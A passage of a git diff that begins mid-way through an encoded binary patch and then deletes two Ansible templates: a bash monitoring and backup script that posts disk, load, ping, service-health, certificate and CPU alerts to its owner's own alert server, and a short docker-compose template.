z0?WfDU@3rtseB>)e*Cupwc|K&sd``H-gV_j2yfd6zXzS#a)!>|npFMa0BPypF`q;3
zTu5122YdsXAQ1tukQ}_#PX4Me9de;aY5F`T3k-T#o^!Y1m<E%rcs(zyYt&`fkJWLK
z0kM<e6B8BpB@z||h}$YX_%}tB+ivT_v9BX}C~o{`NbFE9-sV}^D(0^-X6Qeq_liK3
zSnr;ByJ7dJWiw9|-l*V27pi-CWLGs!=Y0w2G=KG>b^gf+?Ek$<wL;e{_m=y#;@4ZT
zqD1AQ_czD%++P3VcKqB#mXC1Um|(DW{m8z=>0#@Nxs7wns_*X~i-G1Irfr*lQt?$H
zpj7?a7bFXcZW|LL^a186$8Okku5$OM7<%Z+^`in{mq396K+OY$UnR4Q=w-feUw*x9
zc$g)HW*<N}8$X|vlq8ZqA|*xb27@blRA9Phfv(jJL2nzCC{5NA5)+~SCSf41rWgS+
z0%8Qj2#667BOpdVjDQ#cF#=))#0ZEH5F;Q)K#YJG0Wkt%1jGo45fCHrZ;QZz{h|K@
D{Dfjd

diff --git a/templates/alerts.sh.j2 b/templates/alerts.sh.j2
deleted file mode 100644
index 838f95d..0000000
--- a/templates/alerts.sh.j2
+++ /dev/null
@@ -1,63 +0,0 @@
-#!/bin/bash
-
-# Monitoring script
-
-# Secrets
-username="{{ alert_username }}"
-password="{{ alert_password }}"
-VAULT="{{ alert_vault }}"
-
-# Servers
-servers=({{ alert_list_server | join (' ') }})
-local_ip=$(hostname -I | awk '{print $1}')
-
-# SSL
-site="{{ alert_server_ssl }}"
-
-# Vérifier s'il y a un paramètre
-if [ $# -ne 1 ]; then
-    echo "Usage : $0 [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
-    exit 1
-fi
-
-# Récupérer le paramètre
-parametre="$1"
-
-# Vérifier la valeur du paramètre et afficher le résultat correspondant
-if [ "$parametre" = "storage" ]; then
-	[ $(df -h / | awk 'NR==2 {sub(/%/, "", $(NF-1)); print $(NF-1)}') -gt 80 ] && curl -u "$username:$password" -H "Title: Full Storage" -H "ta:card_index_dividers"  -d "90% used on `hostname`" https://alert.jingoh.fr/{{ alerts_storage }}
-elif [ "$parametre" = "load" ]; then
-        [ $(uptime | awk -F'load average: ' '{print $2}' | awk '{print $1}' | cut -d , -f1) '>' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery"  -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }}
-elif [ "$parametre" = "ping" ]; then
-	for ip in "${servers[@]}"
-	do
-  	if [ "$ip" != "$local_ip" ]; then
-    		ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos"  -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }}
-  	fi
-	done
-elif [ "$parametre" = "health" ]; then
-        [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang"  -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-	[ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang"  -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-	[ $(curl -s -o /dev/null -w "%{http_code}" https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang"  -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }}
-elif [ "$parametre" = "ssl" ]; then
-	expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s)
-	current_timestamp=$(date +%s)
-	difference=$((expiration_timestamp - current_timestamp))
-	threshold=$((20 * 24 * 3600))  # 20 jours en secondes
-	if [ $difference -lt $threshold ]; then
-		curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key"  -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }}
-	fi
-elif [ "$parametre" = "backup_git" ]; then
-	docker exec -u git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini
-	mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/
-	docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql
-	mv ./gitea-db-pg.sql /opt/dockerapps/backup/
-	curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray"  -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }}
-elif [ "$parametre" = "backup_vault" ]; then
-	docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual
-	curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray"  -d "Local Backup vault done !" https://alert.jingoh.fr/{{ alerts_backup_vault }}
-elif [ "$parametre" = "cpu" ]; then
-	[ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning"  -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }}
-else
-    echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
-fi
diff --git a/templates/docker-compose.yml.j2 b/templates/docker-compose.yml.j2
deleted file mode 100644
index a293c66..0000000
--- a/templates/docker-compose.yml.j2
+++ /dev/null
@@ -1,2 +0,0 @@
-# {{ ansible_managed }}
-{{ dockerapp_compose | to_nice_yaml(indent=3) }}
\ No newline at end of file